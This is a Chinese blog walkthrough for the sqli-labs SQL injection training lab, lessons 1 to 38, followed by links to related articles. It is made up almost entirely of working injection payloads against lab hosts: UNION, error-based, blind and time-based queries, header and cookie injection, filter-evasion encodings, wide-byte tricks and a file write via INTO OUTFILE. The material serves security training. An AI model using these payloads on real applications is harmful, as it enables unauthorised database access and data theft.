sqli-lab 1-38

最新推荐文章于 2022-07-28 16:56:41 发布
最新推荐文章于 2022-07-28 16:56:41 发布
阅读量595 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zaric_001/article/details/112384436
版权

环境 sqli-labs php 5.5.9

less 1
http://192.168.1.5/sqli-labs/Less-1/
?id=1' and 1=0 union select 1,database(),user() --+

less 2
http://192.168.1.5/sqli-labs/Less-2/
?id=1  and 1=0 union select 1,database(),user() #

less 3
http://192.168.1.5/sqli-labs/Less-2/
?id=1  and 1=0 union select 1,database(),user() #

less 4 代码审计
http://192.168.1.5/sqli-labs/Less-4/
?id=1")  and 1=0 union select 1,database(),version() --%20  

less 5
http://192.168.1.5/sqli-labs/Less-5/
?id=12' and updatexml(1,concat(0x7e,version(),0x7e),1) --%20

less 6
http://192.168.1.5/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,version(),0x7e),1) --%20


less 7
http://192.168.1.5/sqli-labs/Less-7/
?id=1'))  and 1=0 union select 1,2,3 into outfile 'e:/asassadadadasdsadaddad.txt' --+

less 8
http://192.168.1.5/sqli-labs/Less-8/?id=1' and 1=0 union select if(length(database())>1,sleep(5),2),2,3 --+

http://192.168.1.5/sqli-labs/Less-8/?id=1' and ascii(substr((database()),1,1)) >80--+

less 9
http://192.168.1.5/sqli-labs/Less-9/?id=1' and if(length(database())>1,sleep(5),1) --+

less 10
'alert'
select ASCII(substring('alert',1,1));
http://192.168.1.5/sqli-labs/Less-10/?id=1" and if(ASCII(SUBSTRING('alert',1,2))=97,sleep(5),1) --+

less 11
POST /sqli-labs/Less-11/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-11/
Upgrade-Insecure-Requests: 1

uname=Dhakkan' or '1'='1&passwd=1&submit=Submit

less 12
POST /sqli-labs/Less-12/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-12/
Upgrade-Insecure-Requests: 1

uname=Dhakkan") or "1"="1" --+ &passwd=*/&submit=Submit


less 13
POST /sqli-labs/Less-13/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-13/
Upgrade-Insecure-Requests: 1

uname=Dhakkan') or  1=1 #&passwd=&submit=Submit

less 14
POST /sqli-labs/Less-14/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-14/
Upgrade-Insecure-Requests: 1

uname=Dhakkan'" or 1=1 --+&passwd=&submit=Submit


less 15
POST /sqli-labs/Less-15/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-15/
Upgrade-Insecure-Requests: 1

uname=Dhakkan' or 1=1 --+&passwd=&submit=Submit

less 16
POST /sqli-labs/Less-16/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-16/
Upgrade-Insecure-Requests: 1

uname=Dhakkan") or 1=1 --+&passwd=&submit=Submit

less 17
POST /sqli-labs/Less-17/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-17/
Upgrade-Insecure-Requests: 1

uname=Dhakkan&passwd=' and updatexml(1,concat(0x7e,database(),0x7e),1) --+&submit=Submit

less 18
POST /sqli-labs/Less-18/ HTTP/1.1
Host: #
User-Agent: ' and  updatexml(1,concat(7,database(),7),1) and '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin:test
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-18/
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

less 19
POST /sqli-labs/Less-19/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://192.168.1.5
Connection: close
Referer: ' and  updatexml(1,concat(7,database(),7),1) and '
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

less 20
cookie: uname =' and  updatexml(1,concat(7,database(),7),1) and '

less 21
cookie: uname=JyBhbmQgIHVwZGF0ZXhtbCgxLGNvbmNhdCg3LGRhdGFiYXNlKCksNyksMSkgYW5kICc=

less 22
GET /sqli-labs/Less-22/index.php HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.5/sqli-labs/Less-22/index.php
Connection: close
Cookie: uname=YWRtaW4iIGFuZCAgdXBkYXRleG1sKDEsY29uY2F0KDcsZGF0YWJhc2UoKSw3KSwxKSAj
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


less 23
http://192.168.1.5/sqli-labs/Less-23/index.php?id=1'  and 1=0 union select database(),version(),3 and '1'='1

less 24
二次注入
1、构造用户名 admin'#
2、任意修改 均无效

less 25
过滤 and  or  双写即可
http://192.168.1.5/sqli-labs/Less-25/?id=-1' union select database(),user(),version() --+

less 25a
http://192.168.1.5/sqli-labs/Less-25a/
?id=-2 union select database(),user(),version() --+

less 26
分析空格的绕过和截断方式
http://192.168.1.5/sqli-labs/Less-26/?id=1'||updatexml('^',concat(0x7e,user(),0x7e),'^')||'1'='1
http://192.168.1.5/sqli-labs/Less-26/?id=1'||updatexml('^',concat(0x7e,user(),0x7e),'^');%00
select '1'||updatexml('^',concat(0x7e,user(),0x7e),'^');%00

less 26a

空格绕过方式
/**/
%20
括号绕过格,只能用在表达式中,比如 select(user())     where 1=1 and(1=2)
%09 TAB(水平)
%0a 新建一行
%0c 新的一页
%0d return功能
%0b TAB(垂直)      (php-5.2.17,5,3,29成功)
%a0 空格
windows平台可能失败,其他平台%a0可用
http://192.168.1.5/sqli-labs/Less-26a/
?id=1')%a0anandd%a01=2%%a0union%a0select%a0database(),user(),version()%a0;%00
http://192.168.1.5/sqli-labs/Less-26a/?id=1')%a0aandnd%a01=2%a0union%a0select%a0database(),user(),version();%00


less 27
大小写混合绕过
union 双写绕过
select 双写加%0b绕过
http://192.168.1.5/sqli-labs/Less-27/
?id=1'%a0and%a01=2%a0uniunionon%a0se%0bselectlect%a0user(),version(),database();%00
          

less 27a
http://192.168.30.12/sqli-labs/Less-27a/
?id=1"%a0and%a01=0%a0unIon%a0seLEct%a01,2,3%a0or%a0"1"="1
?id=0"%0a%0aununionion%0aSEselectlect%0a1,2,3%0a||%0a"1"="1

LESS 28
%0a 新建一行
%0b 在字符后面垂直换一行并在上一字符后接着写
%a0 空格

http://192.168.30.12/sqli-labs/Less-28/
?id=0')%0aUniOn%0BsElEct%091,database(),3%0aor%0b('1')=('1
?id=0')%0a%0aUNioN%0bseLECt%0a1,2,3%0a||%0a('1')=('1

less 28a
http://192.168.30.12/sqli-labs/Less-28a/?id=10000')%0bunion%0bselect%0b1,2,3%0band('1')=('2

 

less 29
http://192.168.30.12/sqli-labs/Less-29/?id=1' and 1=2 union select database(),version(),database();%00

less 30
http://192.168.30.12/sqli-labs/Less-30/?id=0" union select database(),version(),user();%00

less 31
http://192.168.30.12/sqli-labs/Less-31/
?id=0")%0buNIOn%0bselECT%0bdatabase(),version(),user();%00

less 32
http://192.168.30.12/sqli-labs/Less-32/
?id=2%df'and updatexml(1,concat(2,database(),2),1);%00

http://192.168.30.12/sqli-labs/Less-32/
?id=0%df' union select database(),version(),user();%00

less 33
http://192.168.30.12/sqli-labs/Less-33/?id=0%df' union select database(),version(),user() --+

less 34
Host: 192.168.30.12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.30.12/sqli-labs/Less-34/
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://192.168.30.12
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin%df'+or+1=1 limit 1,2--+&passwd=1234&submit=Submit

less 35
http://192.168.30.12/sqli-labs/Less-35/?id=0

less 36
http://192.168.30.12/sqli-labs/Less-36/?id=0%df' and updatexml(1,concat(2,database(),2),1)--+

less 37
uname=admin%df'+or+1=1 limit 1,2--+&passwd=1234&submit=Submit

less 38
http://192.168.1.5/sqli-labs/Less-38/?id=0' union select version(),database(),user() from dual where  '1'='1';%00

 

Jornici
关注
专栏目录
sqli-labs Less-38、39、40、41、42、43、44、45(sqli-labs闯关指南 38、39、40、41、42、43、44、45)—堆叠注入
m0_54899775的博客
12-27 1092
sqli-labs Less-38、39、40、41、42、43、44、45(sqli-labs闯关指南 38、39、40、41、42、43、44、45)—堆叠注入
sqli-labs(38)
weixin_30522095的博客
06-01 188
0X01 ?id=1' and 1=1%23 正确   ?id=1' and 1=2%23 错误 存在注入 0x1 堆叠注入讲解 (1)前言   国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的。这种技术在SQL注入中还是比较频繁的。 (2...
sqli-lab——Writeup(38~over)堆叠等......
weixin_45694388的博客
12-13 730
知识点: 1.堆叠注入原理(stacked injection) 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 1.1与union查询区别 而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。 1.2使用实例 例如以下这个例子。用
SQLi-LABS-Page-3-less-38-53注入教程
残阳泼茶香的博客
03-17 574
Lesson - 38GET - Stacked Query Injection - String堆叠的查询 输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,http://sql/Less-38/?id=-1%20%2...
sqlilabs38-53详细教程
黑白的博客
11-08 533
声明 学习SQL注入,提高网路安全能力 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
(手工)【sqli-labs38、39】堆叠注入、报错回显、字符/数字型
07-15 493
SQL-堆叠注入、报错回显】
数据库双写
fan1865221的博客
07-28 2644
更换数据库,数据库双写过渡功能
【Ajax】原生ajax、jQUery中的ajax、跨域问题
10-06 423
懒加载,即用则加载,不用则不加载。 ajax介绍 xml介绍 http协议 ajax发送的请求就是http请求 原生、jQuery、fetch、axios、 第一章:原生AJAX 1.1ajax 简介 ajax全称为Asynchronous JavsScript And XML,就是异步的js 和 xml。 通过AJAX可以在浏览器中向服务器发送异步请求,最大的优势:无刷新获取数据。 AJAX不是新的编程语言,而是一种将现有的标准组合在一起使用的新方式。 应用:百度搜索框关键字的自动补全、邮箱注册时.
Http参数详解
叶子的Blog
10-15 859
http包样例 GET /challenges HTTP/1.1 Host: buuoj.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,z
python csrf token_python爬虫如何获取X-CSRF-Token
weixin_39957647的博客
12-08 2176
headers3 = {"Accept": "application/json, text/javascript, */*; q=0.01","Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Connection":...
Python爬虫实现有道翻译
weixin_43375596的博客
03-05 508
# -*- coding: utf-8 -*- #模拟有道翻译 import urllib import urllib2 #通过抓包得到的url地址 url="http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule " #完整的headers headers={ #"Host":"fanyi.youd...
简单的sql注入之一 (实验吧)
wewww111的博客
08-11 3816
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等关键词都被过滤 关键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
ctf /**/与双写 绕过sql过滤
qq_43943098的博客
07-11 3758
注意: 本博客可能转载了多处文章内容,所有转载内容均会标明出处,谢谢!! 0.在文章开始之前的话 本人也这是刚刚接触数据库这一块不过一周的时间,在此之前都是普通的码奴,所以对sql的命令或者语句有着错误的理解,请各位dalao海涵并在评论里指出。 1.浅谈我对sqlsql注入的理解 所谓sql,其原名是结构话查询语句,对于这个结构化我首先想到的是Linux里大部分的命令都带有的 -型的参数,再则...
select 方法
sunshine博客
05-28 1427
关于beautifulsoup---html解析库方法的使用参考一个大神的笔记(https://blog.csdn.net/qq_21933615/article/details/81171951) 首先让我们先了解一下user-agent(地址栏里直接输入about://version即可) 通过user-agent不能完全准确的判断是属于那款浏览器。由于UA字符串在每次浏览器HTTP 请求...
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds.inc"文件中找到数据库凭据。将该文件重命名为"db-creds.inc.php"并填写正确的数据库信息。 5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请注意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值